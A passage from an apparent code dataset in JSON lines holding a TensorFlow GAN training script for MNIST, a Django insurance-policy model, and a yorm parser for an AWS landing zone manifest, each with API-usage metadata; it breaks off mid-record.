+{"seq_id": "361426168", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 21 14:24:15 2017\n\n@author: SalaFeng-\n\"\"\"\n\nimport tensorflow as tf\nimport numpy as np\nfrom skimage.io import imsave\nimport os\nfrom tensorflow.examples.tutorials.mnist import input_data\nbatch_size =256\nmax_epoch =500\nimg_size =28 *28\nz_size =100\nh1_size =150\nh2_size =300\ndef build_generator(Z):\n w1 =tf.Variable(tf.truncated_normal([z_size,h1_size],stddev=0.1),name=\"g_w1\",dtype=tf.float32)\n b1 =tf.Variable(tf.zeros([h1_size]),name=\"g_b1\",dtype=tf.float32)\n h1 =tf.nn.relu(tf.matmul(Z,w1) +b1)\n w2 =tf.Variable(tf.truncated_normal([h1_size,h2_size],stddev=0.1),name=\"g_w2\",dtype=tf.float32)\n b2 =tf.Variable(tf.zeros([h2_size]), name=\"g_b2\", dtype=tf.float32)\n h2 =tf.nn.relu(tf.matmul(h1, w2) + b2)\n w3 =tf.Variable(tf.truncated_normal([h2_size,img_size],stddev=0.1),name=\"g_w3\",dtype =tf.float32)\n b3 =tf.Variable(tf.zeros([img_size]),name=\"g_b3\",dtype=tf.float32)\n h3 =tf.matmul(h2,w3)+b3\n x_generate = tf.nn.tanh(h3)\n g_params =[w1,b1,w2,b2,w3,b3]\n return x_generate,g_params\n \ndef build_discriminator(x_data,x_generator,keep_prob):\n x_in =tf.concat([x_data,x_generator],0)\n w1 = tf.Variable(tf.truncated_normal([img_size, h2_size], stddev=0.1), name=\"d_w1\", dtype=tf.float32)\n b1 = tf.Variable(tf.zeros([h2_size]), name=\"d_b1\", dtype=tf.float32)\n h1 = tf.nn.dropout(tf.nn.relu(tf.matmul(x_in, w1) + b1), keep_prob)\n w2 = tf.Variable(tf.truncated_normal([h2_size, h1_size], stddev=0.1), name=\"d_w2\", dtype=tf.float32)\n b2 = tf.Variable(tf.zeros([h1_size]), name=\"d_b2\", dtype=tf.float32)\n h2 = tf.nn.dropout(tf.nn.relu(tf.matmul(h1, w2) + b2), keep_prob)\n w3 = tf.Variable(tf.truncated_normal([h1_size, 1], stddev=0.1), name=\"d_w3\", dtype=tf.float32)\n b3 = tf.Variable(tf.zeros([1]), name=\"d_b3\", dtype=tf.float32)\n h3 = tf.matmul(h2, w3) + b3\n y_data =tf.nn.sigmoid(tf.slice(h3,[0,0],[batch_size,-1],name =None))\n y_generated = tf.nn.sigmoid(tf.slice(h3, [batch_size, 0], [-1, -1], name=None))\n d_params = [w1, b1, w2, b2, w3, b3]\n return y_data, y_generated, d_params\n\ndef show_result(batch_res, fname, grid_size=(8, 8), grid_pad=5):\n batch_res = 0.5 * batch_res.reshape((batch_res.shape[0], 28, 28)) + 0.5\n img_h, img_w = batch_res.shape[1], batch_res.shape[2]\n grid_h = img_h * grid_size[0] + grid_pad * (grid_size[0] - 1)\n grid_w = img_w * grid_size[1] + grid_pad * (grid_size[1] - 1)\n img_grid = np.zeros((grid_h, grid_w), dtype=np.uint8)\n for i, res in enumerate(batch_res):\n if i >= grid_size[0] * grid_size[1]:\n break\n img = (res) * 255\n img = img.astype(np.uint8)\n row = (i // grid_size[0]) * (img_h + grid_pad)\n col = (i % grid_size[1]) * (img_w + grid_pad)\n img_grid[row:row + img_h, col:col + img_w] = img\n imsave(fname, img_grid)\n\n \ndef train():\n OptimizerName =\"SGD_expenential_decay_rl\"\n init_learning_rate =0.005 \n \n mnist = input_data.read_data_sets('MNIST_data', one_hot=True)\n x_data =tf.placeholder(tf.float32,[batch_size,img_size],name =\"x_data\")\n Z =tf.placeholder(tf.float32,[batch_size,z_size],name =\"Z\")\n keep_prob =tf.placeholder(tf.float32,name =\"keep_prob\")\n global_step =tf.Variable(0,name=\"global_step\",trainable=False)\n \n x_generated,g_params =build_generator(Z)\n y_data, y_generated, d_params = build_discriminator(x_data, x_generated, keep_prob)\n \n d_loss = -tf.reduce_mean(tf.log(y_data) +tf.log(1-y_generated))\n g_loss = -tf.reduce_mean(tf.log(y_generated))\n \n \n\n if OptimizerName ==\"momentum\":\n momentum = 0.9\n optimizer =tf.train.MomentumOptimizer(init_learning_rate,momentum)\n elif OptimizerName == \"Adam\" :\n optimizer=tf.train.AdamOptimizer(init_learning_rate, beta1=0.9, beta2=0.999)\n \n elif OptimizerName ==\"SGD_expenential_decay_rl\":\n learning_rate=tf.train.exponential_decay(init_learning_rate,global_step,50,0.95,staircase=True)\n optimizer=tf.train.GradientDescentOptimizer(learning_rate)\n elif OptimizerName ==\"Adagrad\":\n optimizer =tf.train.AdagradOptimizer(init_learning_rate)\n else: #如果都不是 就用SGD\n optimizer=tf.train.GradientDescentOptimizer(init_learning_rate)\n \n \n d_trainer = optimizer.minimize(d_loss, var_list=d_params)\n g_trainer = optimizer.minimize(g_loss, var_list=g_params)\n #初始化\n init = tf.global_variables_initializer()\n sess = tf.Session()\n sess.run(init)\n \n z_sample_val = np.random.normal(0, 1, size=(batch_size, z_size)).astype(np.float32)\n \n steps = 50000 // batch_size\n for i in range(sess.run(global_step),max_epoch):\n for j in range(steps):\n x_value, _ = mnist.train.next_batch(batch_size)\n x_value = 2 * x_value.astype(np.float32) - 1\n z_value = np.random.normal(0, 1, size=(batch_size, z_size)).astype(np.float32)\n _,D_loss_curr=sess.run([d_trainer,d_loss],feed_dict ={x_data:x_value,Z:z_value,keep_prob: np.sum(0.7).astype(np.float32)})\n _,G_loss_curr=sess.run([g_trainer,g_loss],feed_dict={x_data: x_value,Z:z_value,keep_prob: np.sum(0.7).astype(np.float32)}) \n print('Epoch :{} D_loss:{:0.4f} G_loss:{:0.4f}'.format(i,D_loss_curr,G_loss_curr))\n x_gen_val = sess.run(x_generated, feed_dict={Z: z_sample_val})\n path =\"output/{}_{}\".format(OptimizerName,init_learning_rate)\n if not os.path.exists(path):\n os.mkdir(path)\n print(\"makedir----->{}\".format(path))\n #show_result(x_gen_val, \"{}/{}_{:0.5f}.jpg\".format(path,i,sess.run(learning_rate)))\n show_result(x_gen_val, \"{}/{}.jpg\".format(path,i))\n z_random_sample_val = np.random.normal(0, 1, size=(batch_size, z_size)).astype(np.float32)\n x_gen_val = sess.run(x_generated, feed_dict={Z: z_random_sample_val})\n #show_result(x_gen_val, \"output/out_lr={}_momentum={}/random_sample{}.jpg\".format(learning_rate,momentum,i))\n sess.run(tf.assign(global_step, i + 1))\ntrain() \n \n \n ", "sub_path": "gan_多层感知机.py", "file_name": "gan_多层感知机.py", "file_ext": "py", "file_size_in_byte": 6081, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "tensorflow.Variable", "line_number": 20, "usage_type": "call"}, {"api_name": "tensorflow.truncated_normal", "line_number": 20, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 20, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 21, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 21, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 21, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 22, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 22, "usage_type": "attribute"}, {"api_name": "tensorflow.matmul", "line_number": 22, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow.truncated_normal", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 23, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 24, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 24, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 24, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 25, "usage_type": "attribute"}, {"api_name": "tensorflow.matmul", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.truncated_normal", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 26, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 27, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 27, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 27, "usage_type": "attribute"}, {"api_name": "tensorflow.matmul", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.nn.tanh", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 29, "usage_type": "attribute"}, {"api_name": "tensorflow.concat", "line_number": 34, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.truncated_normal", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 36, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.dropout", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 37, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 38, "usage_type": "call"}, {"api_name": "tensorflow.truncated_normal", "line_number": 38, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 38, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 39, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 39, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 39, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.dropout", "line_number": 40, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 40, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 40, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 40, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 41, "usage_type": "call"}, {"api_name": "tensorflow.truncated_normal", "line_number": 41, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 41, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 42, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 42, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 42, "usage_type": "attribute"}, {"api_name": "tensorflow.matmul", "line_number": 43, "usage_type": "call"}, {"api_name": "tensorflow.nn.sigmoid", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 44, "usage_type": "attribute"}, {"api_name": "tensorflow.slice", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.nn.sigmoid", "line_number": 45, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 45, "usage_type": "attribute"}, {"api_name": "tensorflow.slice", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.uint8", "line_number": 59, "usage_type": "attribute"}, {"api_name": "skimage.io.imsave", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.examples.tutorials.mnist.input_data.read_data_sets", "line_number": 70, "usage_type": "call"}, {"api_name": "tensorflow.examples.tutorials.mnist.input_data", "line_number": 70, "usage_type": "name"}, {"api_name": "tensorflow.placeholder", "line_number": 71, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 71, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 72, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 72, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 73, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 73, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 74, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow.log", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 80, "usage_type": "call"}, {"api_name": "tensorflow.log", "line_number": 80, "usage_type": "call"}, {"api_name": "tensorflow.train.MomentumOptimizer", "line_number": 86, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 86, "usage_type": "attribute"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tensorflow.train.exponential_decay", "line_number": 91, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 91, "usage_type": "attribute"}, {"api_name": "tensorflow.train.GradientDescentOptimizer", "line_number": 92, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 92, "usage_type": "attribute"}, {"api_name": "tensorflow.train.AdagradOptimizer", "line_number": 94, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 94, "usage_type": "attribute"}, {"api_name": "tensorflow.train.GradientDescentOptimizer", "line_number": 96, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 96, "usage_type": "attribute"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 102, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 106, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 106, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 112, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 113, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 113, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 114, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 115, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 119, "usage_type": "call"}, {"api_name": "os.path", "line_number": 119, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 124, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 124, "usage_type": "attribute"}, {"api_name": "tensorflow.assign", "line_number": 127, "usage_type": "call"}]}
+{"seq_id": "53777739", "text": "from django.db import models\nfrom django.conf import settings\n\n# Create your models here.\n\ndef file_name(instance, filename):\n return 'files/{0}/{1}'.format(instance.user.id, filename)\n\nclass Policy(models.Model):\n FREQ_CHOICES = (\n ('monthly', 'monthly'),\n ('weekly', 'weekly'),\n ('quarterly', 'quarterly'),\n ('annually', 'annually'),\n )\n\n owner = models.ForeignKey(settings.AUTH_USER_MODEL)\n carrier_name = models.CharField(max_length=100)\n policy_number = models.IntegerField(primary_key=True)\n start_date = models.DateTimeField(blank=True,null=True)\n end_date = models.DateTimeField(blank=True, null=True)\n cust_serv_number = models.IntegerField(blank=True, null=True)\n cust_serv_email = models.EmailField(blank=True, null=True)\n premium = models.DecimalField(max_digits=10,decimal_places=2,blank=True, null=True)\n frequency = models.CharField(max_length=20, choices=FREQ_CHOICES, blank=True, null=True)\n pdf=models.FileField(upload_to=file_name, blank=True, null=True)\n\n class Meta:\n unique_together = ((\"carrier_name\", \"policy_number\"),)\n\n def save_policy(self):\n self.save()\n\n def __str__(self):\n return str(self.policy_number)\n", "sub_path": "policies/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 1232, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "django.db.models.Model", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 9, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 17, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 21, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 21, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 22, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 22, "usage_type": "name"}, {"api_name": "django.db.models.EmailField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}, {"api_name": "django.db.models.DecimalField", "line_number": 24, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 24, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 25, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 25, "usage_type": "name"}, {"api_name": "django.db.models.FileField", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 26, "usage_type": "name"}]}
+{"seq_id": "196473445", "text": "import yorm\nfrom yorm.types import String, Integer, Float, Boolean\nfrom yorm.types import List, Dictionary, AttributeDictionary\n\n@yorm.attr(name=String)\n@yorm.attr(value=String)\nclass SSM(AttributeDictionary):\n def __init__(self, name, value):\n super().__init__()\n self.name = name\n self.value = value\n\n@yorm.attr(all=SSM)\nclass SSMList(List):\n def __init__(self):\n super().__init__()\n\n@yorm.attr(all=String)\nclass RegionsList(List):\n def __init__(self):\n super().__init__()\n\n@yorm.attr(all=String)\nclass dependsOnList(List):\n def __init__(self):\n super().__init__()\n\n@yorm.attr(all=String)\nclass BaselineProductsList(List):\n def __init__(self):\n super().__init__()\n\n@yorm.attr(all=String)\nclass ApplyToOUList(List):\n def __init__(self):\n super().__init__()\n\n\n@yorm.attr(name=String)\n@yorm.attr(template_file=String)\n@yorm.attr(parameter_file=String)\n@yorm.attr(deploy_method=String)\n@yorm.attr(ssm_parameters=SSMList)\n@yorm.attr(regions=RegionsList)\n@yorm.attr(parameter_override=String)\n@yorm.attr(baseline_products=BaselineProductsList)\n@yorm.attr(depends_on=dependsOnList)\nclass Resource(AttributeDictionary):\n def __init__(self, name, template_file, parameter_file, deploy_method, parameter_override, baseline_products, regions, ssm_parameters, depends_on):\n super().__init__()\n self.name = name\n self.template_file = template_file\n self.parameter_file = parameter_file\n self.deploy_method = deploy_method\n self.baseline_products = []\n self.regions = []\n self.ssm_parameters = []\n self.depends_on = []\n self.parameter_override = parameter_override\n\n\n@yorm.attr(all=Resource)\nclass ResourcesList(List):\n def __init__(self):\n super().__init__()\n\n\n@yorm.attr(name=String)\n@yorm.attr(email=String)\n@yorm.attr(ssm_parameters=SSMList)\n@yorm.attr(core_resources=ResourcesList)\nclass Account(AttributeDictionary):\n def __init__(self, name, email, ssm_parameters, core_resources):\n super().__init__()\n self.name = name\n self.email = email\n self.ssm_parameters = []\n self.core_resources = []\n\n\n@yorm.attr(all=Account)\nclass AccList(List):\n def __init__(self):\n super().__init__()\n\n\n@yorm.attr(name=String)\n@yorm.attr(core_accounts=AccList)\n@yorm.attr(include_in_baseline_products=BaselineProductsList)\nclass OrganizationalUnit(AttributeDictionary):\n def __init__(self, name, include_in_baseline_products, core_accounts):\n super().__init__()\n self.name = name\n self.include_in_baseline_products = []\n self.core_accounts = []\n\n\n@yorm.attr(all=OrganizationalUnit)\nclass OUList(List):\n def __init__(self):\n super().__init__()\n\n\n@yorm.attr(name=String)\n@yorm.attr(description=String)\n@yorm.attr(template_file=String)\n@yorm.attr(skeleton_file=String)\n@yorm.attr(rules_file=String)\n@yorm.attr(parameter_file=String)\n@yorm.attr(ssm_parameters=SSMList)\n@yorm.attr(hide_old_versions=Boolean)\n@yorm.attr(apply_baseline_to_accounts_in_ou=ApplyToOUList)\n@yorm.attr(launch_constraint_role=String)\n@yorm.attr(product_type=String)\nclass Product(AttributeDictionary):\n def __init__(self, name, description, template_file, skeleton_file, rules_file, parameter_file, hide_old_versions, apply_baseline_to_accounts_in_ou, launch_constraint_role, product_type, ssm_parameters):\n super().__init__()\n self.name = name\n self.description = description\n self.template_file = template_file\n self.skeleton_file = skeleton_file\n self.rules_file = rules_file\n self.parameter_file = parameter_file\n self.ssm_parameters = []\n self.hide_old_versions = hide_old_versions\n self.apply_baseline_to_accounts_in_ou = apply_baseline_to_accounts_in_ou\n self.launch_constraint_role = launch_constraint_role\n self.product_type = product_type\n\n\n@yorm.attr(all=Product)\nclass ProductsList(List):\n def __init__(self):\n super().__init__()\n\n\n@yorm.attr(name=String)\n@yorm.attr(description=String)\n@yorm.attr(owner=String)\n@yorm.attr(products=ProductsList)\n@yorm.attr(principal_role=String)\nclass Portfolio(AttributeDictionary):\n def __init__(self, name, description, owner, principal_role, products):\n super().__init__()\n self.name = name\n self.description = description\n self.owner = owner\n self.products = []\n self.principal_role = principal_role\n\n\n@yorm.attr(all=Portfolio)\nclass PortfoliosList(List):\n def __init__(self):\n super().__init__()\n\n\n@yorm.attr(name=String)\n@yorm.attr(policy_file=String)\n@yorm.attr(description=String)\n@yorm.attr(apply_to_accounts_in_ou=ApplyToOUList)\nclass Policy(AttributeDictionary):\n def __init__(self, name, policy_file, description, apply_to_accounts_in_ou):\n super().__init__()\n self.name = name\n self.description = description\n self.policy_file = policy_file\n self.apply_to_accounts_in_ou = apply_to_accounts_in_ou\n\n\n@yorm.attr(all=Policy)\nclass PolicyList(List):\n def __init__(self):\n super().__init__()\n\n\n@yorm.attr(region=String)\n@yorm.attr(version=String)\n@yorm.attr(lock_down_stack_sets_role=Boolean)\n@yorm.attr(organizational_units=OUList)\n@yorm.attr(portfolios=PortfoliosList)\n@yorm.attr(baseline_resources=ResourcesList)\n@yorm.attr(organization_policies=PolicyList)\n@yorm.sync(\"{self.manifest_file}\", auto_create=False)\nclass Manifest:\n def __init__(self, manifest_file):\n self.manifest_file = manifest_file\n self.organizational_units = []\n self.organization_policies = []\n self.portfolios = []\n self.baseline_resources = []\n\n\n\nif __name__ == \"__main__\":\n manifest = Manifest('../../deployment/aws_landing_zone_framework/manifest.yaml')\n\n # print(manifest.organizational_units)\n # if manifest.organizational_units:\n # for ou in manifest.organizational_units:\n # for account in ou.accounts:\n # for resource in account.resources:\n # print(resource.name)\n # print(resource.template_file)\n # print(resource.parameter_file)\n # print(resource.deploy_method)\n # print(resource.regions)\n # else:\n # print(\"No OUs to process\")\n #\n for port in manifest.portfolios:\n print(port.name)\n print(port.principal_role)\n for prod in port.products:\n print(prod.name)\n print(prod.hide_old_versions)\n if len(prod.skeleton_file) > 0:\n print(\"template={}\".format(prod.skeleton_file))\n if len(prod.template_file) > 0:\n print(\"template={}\".format(prod.template_file))\n print(prod.product_type)\n print(prod.apply_baseline_to_accounts_in_ou)\n", "sub_path": "v2.0.1/aws-landing-zone-launch-avm/lib/manifest.py", "file_name": "manifest.py", "file_ext": "py", "file_size_in_byte": 6862, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "yorm.types.AttributeDictionary", "line_number": 7, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 5, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 5, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 6, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 6, "usage_type": "name"}, {"api_name": "yorm.types.List", "line_number": 14, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 13, "usage_type": "call"}, {"api_name": "yorm.types.List", "line_number": 19, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 18, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 18, "usage_type": "name"}, {"api_name": "yorm.types.List", "line_number": 24, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 23, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 23, "usage_type": "name"}, {"api_name": "yorm.types.List", "line_number": 29, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 28, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 28, "usage_type": "name"}, {"api_name": "yorm.types.List", "line_number": 34, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 33, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 33, "usage_type": "name"}, {"api_name": "yorm.types.AttributeDictionary", "line_number": 48, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 39, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 39, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 40, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 40, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 41, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 41, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 42, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 42, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 43, "usage_type": "call"}, {"api_name": "yorm.attr", "line_number": 44, "usage_type": "call"}, {"api_name": "yorm.attr", "line_number": 45, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 45, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 46, "usage_type": "call"}, {"api_name": "yorm.attr", "line_number": 47, "usage_type": "call"}, {"api_name": "yorm.types.List", "line_number": 63, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 62, "usage_type": "call"}, {"api_name": "yorm.types.AttributeDictionary", "line_number": 72, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 68, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 68, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 69, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 69, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 70, "usage_type": "call"}, {"api_name": "yorm.attr", "line_number": 71, "usage_type": "call"}, {"api_name": "yorm.types.List", "line_number": 82, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 81, "usage_type": "call"}, {"api_name": "yorm.types.AttributeDictionary", "line_number": 90, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 87, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 87, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 88, "usage_type": "call"}, {"api_name": "yorm.attr", "line_number": 89, "usage_type": "call"}, {"api_name": "yorm.types.List", "line_number": 99, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 98, "usage_type": "call"}, {"api_name": "yorm.types.AttributeDictionary", "line_number": 115, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 104, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 104, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 105, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 105, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 106, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 106, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 107, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 107, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 108, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 108, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 109, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 109, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 110, "usage_type": "call"}, {"api_name": "yorm.attr", "line_number": 111, "usage_type": "call"}, {"api_name": "yorm.types.Boolean", "line_number": 111, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 112, "usage_type": "call"}, {"api_name": "yorm.attr", "line_number": 113, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 113, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 114, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 114, "usage_type": "name"}, {"api_name": "yorm.types.List", "line_number": 132, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 131, "usage_type": "call"}, {"api_name": "yorm.types.AttributeDictionary", "line_number": 142, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 137, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 137, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 138, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 138, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 139, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 139, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 140, "usage_type": "call"}, {"api_name": "yorm.attr", "line_number": 141, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 141, "usage_type": "name"}, {"api_name": "yorm.types.List", "line_number": 153, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 152, "usage_type": "call"}, {"api_name": "yorm.types.AttributeDictionary", "line_number": 162, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 158, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 158, "usage_type": "name"}, 